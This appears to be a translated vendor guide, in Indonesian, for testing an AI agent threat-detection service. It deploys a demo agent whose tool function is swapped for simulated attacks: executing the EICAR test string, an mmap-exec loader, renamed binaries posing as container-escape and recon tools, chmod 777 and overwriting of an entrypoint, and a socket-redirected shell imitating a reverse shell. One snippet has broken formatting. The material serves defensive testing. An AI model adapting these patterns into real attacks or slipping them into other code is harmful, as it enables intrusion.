Menguji Deteksi Ancaman Agent Engine

Halaman ini menjelaskan cara memverifikasi bahwa Deteksi Ancaman Agent Engine berfungsi dengan memicu detektor secara sengaja dan memeriksa temuan. Deteksi Ancaman Agent Engine adalah layanan bawaan Security Command Center.

Sebelum memulai

Untuk mendeteksi potensi ancaman terhadap agen Vertex AI Agent Engine, pastikan bahwa layanan Deteksi Ancaman Agent Engine diaktifkan di Security Command Center.

Lingkungan penyiapan

Untuk menguji Deteksi Ancaman Agent Engine, siapkan agen demo yang mensimulasikan aktivitas berbahaya.

Membuat project dan mengaktifkan shell

Pilih atau buat Google Cloud project untuk digunakan dalam pengujian.

Untuk menguji detektor, Anda dapat menggunakan Google Cloud konsoldan Cloud Shell.

  1. Buka Google Cloud konsol.

    Buka Google Cloud konsol

  2. Pilih project yang akan Anda gunakan untuk pengujian.

  3. Klik Aktifkan Cloud Shell.

Anda juga dapat menjalankan petunjuk pengujian dari shell lokal.

Menyiapkan Vertex AI Agent Engine

Jika Anda belum pernah menggunakan Vertex AI Agent Engine di project ini, Siapkan lingkungan Vertex AI Agent Engine sebelum memulai. Catat nama bucket Cloud Storage staging yang Anda buat. Sebaiknya ikuti panduan memulai Vertex AI Agent Engine untuk mempelajari cara mengembangkan dan men-deploy agen dengan Vertex AI SDK.

Membuat skrip pengujian

Anda akan membuat beberapa file yang akan digunakan untuk men-deploy agen baru untuk pengujian. Gunakan editor teks untuk melakukannya, seperti nano.

  1. Buat file baru bernama requirements.txt dengan konten berikut.

    google-cloud-aiplatform[agent_engines]
    google-adk
    google-genai
    aiohttp
    cloudpickle
    pydantic
    
  2. Buat file kosong baru bernama installation_scripts/install.sh. Beberapa pengujian mengharuskan penambahan konten ke file ini.

  3. Buat file baru bernama main.py, dengan konten berikut. Ganti variabel PROJECT_ID, LOCATION, dan STAGING_BUCKET. Nama bucket staging harus menyertakan awalan gs://.

    import asyncio
    import os
    import subprocess
    import socket
    import vertexai
    from vertexai import Client, agent_engines
    from google.adk.agents import llm_agent
    from google.adk.sessions.in_memory_session_service import InMemorySessionService
    
    # Replace with your own project, location, and staging bucket.
    LOCATION = "LOCATION"
    PROJECT_ID = "PROJECT_ID"
    # Staging bucket must have gs:// prefix
    STAGING_BUCKET = "STAGING_BUCKET"
    
    client = Client(project=PROJECT_ID, location=LOCATION)
    
    def _run_command(args, **kwargs):
      output = f"Called {' '.join(args)}\n"
      try:
        res = subprocess.run(args, capture_output=True, text=True, **kwargs)
        if res.stdout:
          output += f"Result: {res.stdout.strip()}\n"
        if res.stderr:
          output += f"Error: {res.stderr.strip()}\n"
      except subprocess.TimeoutExpired:
        output += "Command timed out as expected."
      return output
    
    # Tool to simulate threats. The function body will be replaced for individual
    # detector tests.
    def threat_detection_test():
      output = _run_command(["sleep", "60"])
      output += _run_command(["echo", "this is a fake threat"])
      output += _run_command(["sleep", "10"])
      return output
    
    root_agent = llm_agent.Agent(
        model="gemini-2.5-flash",
        name="threat_detection_test_agent",
        description="Runs threat detection test.",
        instruction="""
          You are an agent that runs a threat detection test using a fake malicious
          command.
        """,
        tools=[threat_detection_test],
    )
    
    async def main():
      vertexai.init(
        project=PROJECT_ID,
        location=LOCATION,
        staging_bucket=STAGING_BUCKET,
      )
      app = agent_engines.AdkApp(
          agent=root_agent, session_service_builder=InMemorySessionService
      )
      remote_agent = client.agent_engines.create(
          agent=app,
          config={
              "display_name": "scc_threat_test_agent",
              "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY,
              "requirements": [
                  "google-cloud-aiplatform[agent_engines,adk]",
                  "cloudpickle",
                  "pydantic",
              ],
              "staging_bucket": STAGING_BUCKET,
              "extra_packages": [
                  "installation_scripts/install.sh",
              ],
          },
      )
      print("Deployed agent: ", remote_agent.api_resource.name)
    
      try:
          async for event in remote_agent.async_stream_query(
              user_id="threat_detection_tester",
              message="Run the threat detection test",
          ):
            print(event)
      finally:
          client.agent_engines.delete(name=remote_agent.api_resource.name, force=True)
    
    if __name__ == "__main__":
      asyncio.run(main())
    

Menyiapkan lingkungan virtual

  1. Buat dan aktifkan lingkungan virtual Python.

      python3 -m venv env
      source env/bin/activate
    
  2. Instal dependensi yang diperlukan di lingkungan virtual.

    pip install -r requirements.txt
    

Menguji skrip

Jalankan skrip dari dalam lingkungan virtual dengan python3 main.py. Perintah ini akan memerlukan waktu beberapa menit untuk membangun, men-deploy, dan menjalankan agen pengujian.

Skrip ini menampilkan nama resource agen yang di-deploy, dan beberapa objek JSON termasuk respons LLM dan metadata lainnya. Jika Anda mengalami error izin atau error deployment pada tahap ini, lihat pemecahan masalah untuk langkah berikutnya.

Menguji detektor

Untuk menguji detektor Deteksi Ancaman Agent Engine, ganti kode dalam fungsi threat_detection_test dengan kode yang mensimulasikan serangan. Skrip dapat memerlukan waktu lama untuk men-deploy dan membuat kueri agen. Untuk mempercepat pengujian, Anda dapat menggabungkan konten beberapa fungsi ini.

Eksekusi: Biner Berbahaya Ditambahkan Dieksekusi

Ganti fungsi threat_detection_test dalam skrip pengujian, lalu jalankan skrip pengujian.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  output += _run_command(["touch", "/tmp/test_mal_file"])
  with open("/tmp/test_mal_file", "w") as f:
    f.write(eicar)
  output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
  output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
  output += _run_command(["sleep", "10"])
  return output

Eksekusi: Koleksi Berbahaya Ditambahkan Dimuat

Ganti fungsi threat_detection_test dalam skrip pengujian, lalu jalankan skrip pengujian. Anda mungkin menerima error dari Vertex AI SDK tentang penguraian respons, tetapi temuan tetap dibuat.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  with open("/tmp/test_mal_lib", "w") as f:
    f.write(eicar)
  with open("/tmp/loader.c", "w") as f:
    f.write("""
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         struct stat sb;
         fstat(fd, &sb);
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
    """)
  output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
  output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
  output += _run_command(["sleep", "10"])
  return output

Eksekusi: Container Escape

Ganti fungsi threat_detection_test dalam skrip pengujian, lalu jalankan skrip pengujian.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
  output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
  output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
  output += _run_command(["sleep", "10"])
  return output

Eksekusi: Eksekusi Alat Serangan Kubernetes

Ganti fungsi threat_detection_test dalam skrip pengujian, lalu jalankan skrip pengujian.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
  output += _run_command(["/tmp/amicontained"])
  output += _run_command(["sleep", "10"])
  return output

Eksekusi: Eksekusi Alat Pengintaian Lokal

Ganti fungsi threat_detection_test dalam skrip pengujian, lalu jalankan skrip pengujian.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
  output += _run_command(["/tmp/linenum.sh"])
  output += _run_command(["sleep", "10"])
  return output

Eksekusi: Biner Berbahaya Dimodifikasi Dieksekusi

Replace the `threat_detection_test` function in the test script, and then run the
test script.

```python
def threat_detection_test():
    eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
    output = _run_command(["sleep", "60"])
    output += _run_command(["chmod", "-R", "777", "/code"])
    with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)

output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```

Eksekusi: Koleksi Berbahaya Dimodifikasi Dimuat

Ganti fungsi threat_detection_test dalam skrip pengujian, lalu jalankan skrip pengujian.

def threat_detection_test():
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  output = _run_command(["sleep", "60"])
  output += _run_command(["chmod", "-R", "777", "/code"])
  with open("/code/entrypoint.sh", "w") as f:
    f.write(eicar)
  with open("/tmp/loader.c", "w") as f:
    f.write("""
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         struct stat sb;
         fstat(fd, &sb);
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
    """)
  output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
  output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
  output += _run_command(["sleep", "10"])
  return output

URL Berbahaya Teramati

Perbarui file installation_scripts/install.sh dengan konten berikut.

#!/bin/bash
apt-get install -y curl --no-install-recommends

Ganti fungsi threat_detection_test dalam skrip pengujian, lalu jalankan skrip pengujian.

def threat_detection_test():
  url = "https://testsafebrowsing.appspot.com/s/malware.html"
  output = _run_command(["sleep", "60"])
  output += _run_command(["curl", url])
  output += _run_command(["sleep", "10"])
  return output

Reverse Shell

Ganti fungsi threat_detection_test dalam skrip pengujian, lalu jalankan skrip pengujian.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect(("8.8.8.8", 53))
  subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
  output += _run_command(["sleep", "10"])
  return output

Langkah berikutnya